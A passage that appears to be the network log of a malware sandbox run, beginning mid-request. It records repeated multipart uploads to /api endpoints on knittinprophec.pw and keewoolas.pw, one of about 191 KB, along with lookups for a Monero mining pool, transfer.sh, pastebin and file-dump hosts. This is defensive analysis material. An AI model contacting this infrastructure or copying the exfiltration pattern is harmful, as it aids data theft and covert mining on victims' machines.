User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=p6gutdhkovdk6k2dl09lj42fek; expires=Tue, 12 Mar 2024 09:54:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YsnN2AW3JVJGDj59PQgeshWTt2ZooI4daIyHWhTug6uqqerLfWw2P%2FZYXB%2FC5bYg1cVOCRYkH%2BirLXAbRStjfz1KiVqOfrqaRxPT88YxQxVtG9bVg%2F4HuxpqkSHVyje8QtvylA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a266f241b0b-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=hil9aitu9jpn2930q4vjj0jm3s; expires=Tue, 12 Mar 2024 09:54:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omwfYA2mjS0KivKtP44rKU8qH08HVGRFXpLUVbtcJkV5r%2FKOuPLRpB6pA%2FkfMAciPl2mvAGJ8uS5Rw8tYRviw%2FmXPJ%2FONHzAJiSXjMTiBwgERt0QtmnFyT58KnFH0J7alSb7TA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a29abc9b8e4-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=rmh7f83fp41legcv54hm5t2l42; expires=Tue, 12 Mar 2024 09:54:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wQvIMFlq5iiAOcF1VL4t6kjOXF9Sdj9pBOC40u24HrGgdznuKL6w2kWx5t6ImABR5qIEPx8d%2B0L4ODBFGGjwkjgq6L3QASrlGML%2F1bvUPpxgBreZ85PbYo5D2y16jZ9gCSxbFg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a2cd99c6702-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=486172edlfmv9946vq4obmscud; expires=Tue, 12 Mar 2024 09:54:12 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:33 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sSDO%2Fw4uWHZthPKRb96WIPiXzcIFMOtHzJNQaAVyUnnlpbUaND3exTyDBhPUeeoR%2BWHHh33fH3Vbv6DjEXOwwhv%2B03iegBP4xxd0KUI3Y0vDnKHqMRV9RSBvt4fCgZnRn86Btg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a3089f60e5c-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 963
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=j9hjedg52q3lb2rnlcch05g6ed; expires=Tue, 12 Mar 2024 09:54:13 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:34 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UqaUs0Nw%2BSVhCIkTsZEsa3qDaulWyLONNiEXpNOiSX1SJvIImekM%2FNRfaPkL5IQS3Etxf%2BCbVrAtBZRkn7sa%2BuRpxRY4J9xZf4OLv8mHSpR%2FfxcamKzE7mNBoC4IYakUtyHCBA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a351e5c6646-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 191553
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=urhf71h40ttiblg37k8rbhtm7b; expires=Tue, 12 Mar 2024 09:54:15 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:36 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GnzerByLdhd6JYBbH8o0fHcD6x2%2FHqNbzi2zmkDjPAXG9NMlUnOlCWpZL5vF7pzrS4D5DjIg7isvbH6v7sfxVgxZNwhzkc%2FTPqhUV7VM3Ia7f51cEdd6ZWX3AEwjFytetX1tmg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a3a8f23b98f-AMS
DNS

8a202e98-6662-4b45-82d3-a54220c1a288.uuid.filesdumpplace.org

Remote address:

8.8.8.8:53

Request

8a202e98-6662-4b45-82d3-a54220c1a288.uuid.filesdumpplace.org

IN TXT

Response
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 1523
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bt0k6l6s8qdah9c99t995q4r4s; expires=Tue, 12 Mar 2024 09:54:16 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:37 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4DPbtjFJ5GDLZ8kWw5gIteHz9%2FirgaLMhsb8PTJ5NW1ZZtcCRNcJoHNsjoV9tkbD5YMGOwvAm8PGnSbP%2BVMKULaJRmcHOXNwsZKqLF8FgdWIxw2ky6l0G%2BMAoqdOZkTqh8RJtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a4a4d336693-AMS
DNS

219.118.33.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

219.118.33.45.in-addr.arpa

IN PTR

Response

219.118.33.45.in-addr.arpa

IN PTR

45-33-118-219iplinodeusercontentcom
DNS

2no.co

Remote address:

8.8.8.8:53

Request

2no.co

IN A

Response

2no.co

IN A

104.21.79.229

2no.co

IN A

172.67.149.76
GET

http://www.google.com/

Remote address:

142.251.39.100:80

Request

GET / HTTP/1.1
User-Agent: Disney
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Q0VjLMD4O_-_CqXZDzihIg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-11-17-16; expires=Sun, 17-Dec-2023 16:07:44 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ackid1SD9nxXhelU6AyLfFsCJNf8B9upmxiR4XTi3O7OXVgPs1607cujwk4; expires=Wed, 15-May-2024 16:07:44 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=iZ4Fj_SQCi2kxBhEJRd4xYUwEIdNylnb2rz_C_KsUg5W8bmCy1rRc3dtoDhGYUERu6hwOxwu2VMBFHubqwGcaL4zfpX5r8XmMRKZxp_BJ4aEMhX-FwpBxB8XDjrYi17BNw6-uGaEFCbsc_Sdc-kDIRI6i893F2g5l7W3sHhds3Y; expires=Sat, 18-May-2024 16:07:44 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

229.79.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

229.79.21.104.in-addr.arpa

IN PTR

Response
DNS

35.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.36.251.142.in-addr.arpa

IN PTR

Response

35.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f31e100net
DNS

jTKrwQUFbloAgdx.jTKrwQUFbloAgdx

Remote address:

8.8.8.8:53

Request

jTKrwQUFbloAgdx.jTKrwQUFbloAgdx

IN A

Response
DNS

100.39.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.39.251.142.in-addr.arpa

IN PTR

Response

100.39.251.142.in-addr.arpa

IN PTR

ams15s48-in-f41e100net
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

247.247.92.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

247.247.92.91.in-addr.arpa

IN PTR

Response
DNS

server7.filesdumpplace.org

Remote address:

8.8.8.8:53

Request

server7.filesdumpplace.org

IN A

Response

server7.filesdumpplace.org

IN A

185.82.216.96
DNS

stun1.l.google.com

Remote address:

8.8.8.8:53

Request

stun1.l.google.com

IN A

Response

stun1.l.google.com

IN A

64.233.164.127
DNS

walkinglate.com

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.97.0

walkinglate.com

IN A

188.114.96.0
DNS

127.164.233.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.164.233.64.in-addr.arpa

IN PTR

Response

127.164.233.64.in-addr.arpa

IN PTR

lf-in-f1271e100net
DNS

96.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

96.216.82.185.in-addr.arpa

IN PTR

Response

96.216.82.185.in-addr.arpa

IN PTR

dedic-mariadebommarez-1201693hosted-by-itldccom
DNS

0.97.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.97.114.188.in-addr.arpa

IN PTR

Response
DNS

16.205.10.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.205.10.195.in-addr.arpa

IN PTR

Response
DNS

182.118.218.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.118.218.193.in-addr.arpa

IN PTR

Response

182.118.218.193.in-addr.arpa

IN PTR

182118218193urdncomua
DNS

65.226.215.181.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.226.215.181.in-addr.arpa

IN PTR

Response
DNS

118.55.229.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.55.229.46.in-addr.arpa

IN PTR

Response

118.55.229.46.in-addr.arpa

IN PTR

1185522946vikhostcom
DNS

xmr-eu1.nanopool.org

Remote address:

8.8.8.8:53

Request

xmr-eu1.nanopool.org

IN A

Response

xmr-eu1.nanopool.org

IN A

163.172.154.142

xmr-eu1.nanopool.org

IN A

212.47.253.124

xmr-eu1.nanopool.org

IN A

51.15.193.130

xmr-eu1.nanopool.org

IN A

51.68.143.81

xmr-eu1.nanopool.org

IN A

51.15.65.182

xmr-eu1.nanopool.org

IN A

51.255.34.118

xmr-eu1.nanopool.org

IN A

135.125.238.108

xmr-eu1.nanopool.org

IN A

51.15.58.224

xmr-eu1.nanopool.org

IN A

51.68.190.80
DNS

server7.filesdumpplace.org

Remote address:

8.8.8.8:53

Request

server7.filesdumpplace.org

IN A

Response

server7.filesdumpplace.org

IN A

185.82.216.96
DNS

130.193.15.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

130.193.15.51.in-addr.arpa

IN PTR

Response

130.193.15.51.in-addr.arpa

IN PTR

130-193-15-51 instancesscwcloud
DNS

pastebin.com

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
DNS

81.143.68.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.143.68.51.in-addr.arpa

IN PTR

Response

81.143.68.51.in-addr.arpa

IN PTR

vps-1277fdb0vpsovhnet
DNS

15.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.173.189.20.in-addr.arpa

IN PTR

Response
DNS

keewoolas.pw

Remote address:

8.8.8.8:53

Request

keewoolas.pw

IN A

Response

keewoolas.pw

IN A

172.67.219.233

keewoolas.pw

IN A

104.21.24.188
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eeWejXgOUox%2FFDrRnfLdKVDsOnZLyX1Fainfqq45eCpKPlSuu6aClzPCfB2DqJtBvYp%2FXlaomQJ1Ll1U05F%2BQ4YuOlQCPjXWP7t5XIfe14IwOTMnH1C9iOMSf1lnqvU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b319b6966a4-AMS
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=hcp9v8famhh00dha8rf159l1m4; expires=Tue, 12 Mar 2024 09:54:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FAtGBtgSN60i1CUApE9LbdYXuHGEvmESHorOua4Z7GLyQAOYB1sRQsyR93ZJIULHS63OEc3yEyJQG2r3Xz9aBLQuSCbUWx7TZZlI5IfpuMiv7Tat8Xx%2B5inCY%2FxdAPU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b35882866a4-AMS
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: keewoolas.pw
Content-Length: 47
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=gm4cmhlk0g6qpmegdipj8llmp1; expires=Tue, 12 Mar 2024 09:54:53 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:14 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Do8WeAGFdfjZwCnubdDhvZwTZ63%2BGSm3k5yPQOcSiG0zlAQVJUlrQqvqb6p0LgzEeBk%2FddDvTZ2u5FpWF%2FhAulQPj%2BXIPRNKNOHRXU9rl5b46x0qA%2ByuL8ZbFFlEcho%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b31f86d0eaa-AMS
DNS

transfer.sh

Remote address:

8.8.8.8:53

Request

transfer.sh

IN A

Response

transfer.sh

IN A

144.76.136.153
DNS

233.219.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.219.67.172.in-addr.arpa

IN PTR

Response
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=cv8rvqpfvnh2ilpk7aj243ut8k; expires=Tue, 12 Mar 2024 09:54:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=adC%2Bu712y1n0adGFl2CpchdQMI0AAQiVRphyix7vHVQSXv1mWHzbh%2BUTuwq4wLP8bZxM%2FCQwv4csh6iUFnyYYj1csKg%2FF9mB%2F9RfwJ3qB7UkhUV1oQ0NaIKgHKvL4Yg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b38fdde65f3-AMS
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5g54pppat8qmdoleenppjpu5ab; expires=Tue, 12 Mar 2024 09:54:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dVpBpVkbx7hCsHH43wq0k%2BTMFuzThNjuWx83n4de3x2LZKXVWBxPaG7oPC%2B3jPDhfTKzTVcFNSGowofzUBwqLGyJ7dayfD%2FY2fyw9Sfohh8%2ByP7i7uNgdpfr2duZ4Gk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b3c696f1c89-AMS
DNS

153.136.76.144.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.136.76.144.in-addr.arpa

IN PTR

Response

153.136.76.144.in-addr.arpa

IN PTR

transfersh
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=tohche3i55hrr1dfo2vsn8uv44; expires=Tue, 12 Mar 2024 09:54:55 GMT; Max-Age=9999999; path=/
